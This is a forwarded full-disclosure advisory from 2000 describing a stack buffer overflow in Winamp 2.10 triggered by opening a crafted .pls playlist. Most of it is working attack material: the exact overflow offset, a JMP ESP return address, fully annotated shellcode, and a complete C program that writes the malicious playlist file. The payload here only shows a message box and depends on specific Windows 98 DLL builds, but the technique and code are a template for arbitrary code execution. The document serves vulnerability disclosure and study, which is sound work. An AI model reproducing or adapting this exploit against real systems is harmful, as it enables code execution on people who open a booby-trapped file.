FYI


-----Original Message-----
From: darkplan [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, January 04, 2000 4:15 PM
To: [EMAIL PROTECTED]
Subject: Winamp buffer overflow advisory


Nullsoft Winamp 2.10 buffer overflow advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Author: Steve Fewer, [EMAIL PROTECTED]
                     http://indigo.ie/~lmf
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Introduction:

I recently uncovered a stack-based buffer overflow in Winamp
version 2.10 that allows arbitrary code execution. It is
triggered through .pls files, which Winamp uses for playlists:
merely opening a crafted playlist is enough. This is unnerving
because a malicious playlist is a plausible thing to receive,
e.g. traded on IRC during an mp3 trading session with someone.

The overflow occurs when a File entry longer than 580 bytes is
read in from a .pls file. The four bytes that follow the first
580 overwrite the saved return address (and so EIP) - no other
register is affected - and everything after those four bytes is
available for your shell code, e.g.

[playlist]
File1=<580 bytes><eip><shell code>
NumberOfEntries=1  

The first 580 bytes get mangled in memory, but at the moment of
the return ESP points at the 585th byte (where our shell code
starts), so a simple 'JMP ESP' or the like lands us in our shell
code. I used a 'JMP ESP' at address 0xBFB9CFF7 in comctl32.dll,
which Winamp loads. Setting EIP to that address takes us where we
want to be. Note that this address, like the ones used in the
shell code below, is an absolute address from the DLL build on
the test system; it has to be re-located for any other version.

This was all created/tested on Windows 98 [Version 4.10.1998]
running on an Intel PII400 with 128MB RAM.


The Shell Code:

The shell code I wrote for this simply displays a message box
and then calls exit(). However, Winamp doesn't load msvcrt.dll,
which is needed to call exit(), so we have to load it ourselves.
I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for
LoadLibraryA(). For calling MessageBox I used the address
0xBFF5412E in user32.dll (v4.10.1998), and for calling exit() I
used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). I did
not bother resolving these via GetProcAddress for compatibility's
sake, so the hard-coded addresses are tied to exactly those DLL
versions and the shell code will not work on any other build.
For the OP codes see the exploit further on.

    // Shell code used by the exploit (32-bit Intel syntax, as used in VC++
    // inline asm).  Every call goes through an absolute address that is first
    // pushed onto the stack and then called via [ebp-X].  The addresses are
    // those of kernel32.dll / user32.dll on Windows 98 4.10.1998 and of
    // msvcrt.dll 6.00.8397.0 and are only valid for exactly those builds.
    // None of the three segments unwinds its frame: the final exit() never
    // returns, so there is nothing to restore.
    // This loads msvcrt.dll: LoadLibraryA("MSVCRT.DLL")
    push ebp
    mov ebp,esp                     // new frame; locals are built below ebp
    xor eax,eax
    push eax                        // [ebp-04h] = 0
    push eax                        // [ebp-08h] = 0
    push eax                        // [ebp-0Ch] = 0 -> 12 zero bytes for the name
    mov byte ptr[ebp-0Ch],4Dh       // 'M'
    mov byte ptr[ebp-0Bh],53h       // 'S'
    mov byte ptr[ebp-0Ah],56h       // 'V'
    mov byte ptr[ebp-09h],43h       // 'C'
    mov byte ptr[ebp-08h],52h       // 'R'
    mov byte ptr[ebp-07h],54h       // 'T'
    mov byte ptr[ebp-06h],2Eh       // '.'
    mov byte ptr[ebp-05h],44h       // 'D'
    mov byte ptr[ebp-04h],4Ch       // 'L'
    mov byte ptr[ebp-03h],4Ch       // 'L'  ([ebp-02h],[ebp-01h] stay 0 = NUL terminator)
    mov edx,0xBFF776D4              // LoadLibraryA (kernel32.dll v4.10.1998)
    push edx                        // [ebp-10h] = &LoadLibraryA
    lea eax,[ebp-0Ch]
    push eax                        // arg: lpLibFileName = "MSVCRT.DLL"
    call dword ptr[ebp-10h]         // LoadLibraryA("MSVCRT.DLL")
    // This calls MessageBox to say 'Hi!': MessageBoxA(0, "Hi!", "Hi!", 0)
    push ebp
    mov ebp,esp
    xor edi,edi                     // edi = 0, reused for hWnd and uType
    push edi                        // [ebp-04h] = 0 -> 4 bytes for "Hi!" + NUL
    mov byte ptr[ebp-04h],48h       // 'H'
    mov byte ptr[ebp-03h],69h       // 'i'
    mov byte ptr[ebp-02h],21h       // '!'  ([ebp-01h] stays 0 = NUL terminator)
    mov edx, 0xBFF5412E             // MessageBoxA (user32.dll v4.10.1998)
    push edx                        // [ebp-08h] = &MessageBoxA
    push edi                        // uType = 0
    lea edx,[ebp-04h]               // edx = "Hi!" (the address is already saved on the stack)
    push edx                        // lpCaption = "Hi!"
    push edx                        // lpText = "Hi!"
    push edi                        // hWnd = 0
    call dword ptr[ebp-08h]         // MessageBoxA(hWnd, lpText, lpCaption, uType)
    // This calls exit(): exit(0) from the msvcrt.dll loaded above
    push ebp
    mov ebp,esp
    mov edx,0xFFFFFFFF
    sub edx,0x87FFAAFB              // edx = 0x78005504 = exit (msvcrt.dll v6.00.8397.0);
                                    // computed because the address contains 00h bytes, which
                                    // would end the File1= entry when it is written as a string
    push edx                        // [ebp-04h] = &exit
    xor eax,eax
    push eax                        // arg: status = 0
    call dword ptr[ebp-04h]         // exit(0) - never returns

The Exploit:

<-snip->

/* Stack based buffer overflow exploit for Winamp v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at [EMAIL PROTECTED]
 *
 * For a detailed description on the exploit see my advisory.
 *
 * Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */

#include <stdio.h>
#include <string.h>

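/* Number of filler bytes that carry the File1= entry up to the saved return address. */
#define PAD_LEN 580

/* Address of a 'JMP ESP' in comctl32.dll on Windows 98 4.10.1998 (0xBFB9CFF7),
 * stored little-endian so it lands in EIP when the return address is popped. */
static const char JMP_ESP[4] = "\xF7\xCF\xB9\xBF";

/* Shell code from the advisory: LoadLibraryA("MSVCRT.DLL"),
 * MessageBoxA(0, "Hi!", "Hi!", 0), exit(0).
 * Every address is hard-coded for Windows 98 4.10.1998 (kernel32.dll,
 * user32.dll) and msvcrt.dll 6.00.8397.0, so the payload only works
 * against that exact build.  The bytes must not contain 0x00 (the entry is
 * handled as a C string) nor 0x0A/0x0D (the whole entry sits on one
 * playlist line).  Written as adjacent literals so an e-mail line wrap
 * cannot split a \x escape. */
static const char SHELLCODE[] =
    /* LoadLibraryA("MSVCRT.DLL") */
    "\x55\x8B\xEC"                                      /* push ebp; mov ebp,esp */
    "\x33\xC0\x50\x50\x50"                              /* xor eax,eax; push eax x3 -> 12 zero bytes */
    "\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56"  /* "MSV" at [ebp-0Ch] */
    "\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54"  /* "CRT" */
    "\xC6\x45\xFA\x2E\xC6\x45\xFB\x44"                  /* ".D" */
    "\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C"                  /* "LL", NUL already in place */
    "\xBA\xD4\x76\xF7\xBF\x52"                          /* mov edx,0xBFF776D4 (LoadLibraryA); push edx */
    "\x8D\x45\xF4\x50"                                  /* lea eax,[ebp-0Ch]; push eax (lpLibFileName) */
    "\xFF\x55\xF0"                                      /* call dword ptr [ebp-10h] */
    /* MessageBoxA(0, "Hi!", "Hi!", 0) */
    "\x55\x8B\xEC\x33\xFF\x57"                          /* push ebp; mov ebp,esp; xor edi,edi; push edi */
    "\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21"  /* "Hi!" at [ebp-4], NUL at [ebp-1] */
    "\xBA\x2E\x41\xF5\xBF\x52"                          /* mov edx,0xBFF5412E (MessageBoxA); push edx */
    "\x57\x8D\x55\xFC\x52\x52\x57"                      /* push uType; lea edx,[ebp-4]; push caption; push text; push hWnd */
    "\xFF\x55\xF8"                                      /* call dword ptr [ebp-8] */
    /* exit(0) */
    "\x55\x8B\xEC"                                      /* push ebp; mov ebp,esp */
    "\xBA\xFF\xFF\xFF\xFF"                              /* mov edx,0xFFFFFFFF */
    "\x81\xEA\xFB\xAA\xFF\x87"                          /* sub edx,0x87FFAAFB -> 0x78005504 (exit) without NUL bytes */
    "\x52\x33\xC0\x50"                                  /* push edx; xor eax,eax; push eax (status 0) */
    "\xFF\x55\xFC";                                     /* call dword ptr [ebp-4] */

/* Writes the malicious playlist to `path`.  The File1= entry is laid out as
 *   PAD_LEN filler bytes | JMP_ESP (overwrites the return address) | SHELLCODE
 * Returns 0 on success, -1 if the file could not be created or fully written
 * (an error message is printed via perror). */
static int write_exploit(const char *path)
{
    char pad[PAD_LEN];
    FILE *fp;
    int ok;

    fp = fopen(path, "wb");
    if (fp == NULL) {
        perror(path);
        return -1;
    }

    /* Filler only: per the advisory execution enters the shell code through
     * JMP ESP, so these bytes are never run as code.  The original version
     * printed an unterminated 640-byte buffer with %s, which read past the
     * 580 initialised bytes; writing exactly PAD_LEN bytes avoids that. */
    memset(pad, 0x90, sizeof pad);

    ok = fputs("[playlist]\nFile1=", fp) >= 0
      && fwrite(pad, 1, sizeof pad, fp) == sizeof pad
      && fwrite(JMP_ESP, 1, sizeof JMP_ESP, fp) == sizeof JMP_ESP
      && fwrite(SHELLCODE, 1, sizeof SHELLCODE - 1, fp) == sizeof SHELLCODE - 1
      && fputs("\nNumberOfEntries=1", fp) >= 0;

    /* fclose can still fail on a full disk; treat that as a write failure too. */
    if (fclose(fp) != 0)
        ok = 0;
    return ok ? 0 : -1;
}

/* Prints the banner, writes crAsh.pls into the current directory and reports
 * the result.  Returns 0 on success, 1 if the playlist could not be written. */
int main(void)
{
    printf("\n\n\t\t.......................................\n");
    printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
    printf("\t\t.......................................\n");
    printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
    printf("\t\t.........http://indigo.ie/~lmf.........\n");
    printf("\t\t.......................................\n\n");

    if (write_exploit("crAsh.pls") != 0)
        return 1;

    printf("\t     created file crAsh.pls loaded with the exploit.\n");
    return 0;
}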

<-snip->

Steve


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-- 
NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455
Flat 2,   43 Howitt Road,   Belsize Park,   London NW3 4LU
   Epage [EMAIL PROTECTED] [body of text only]
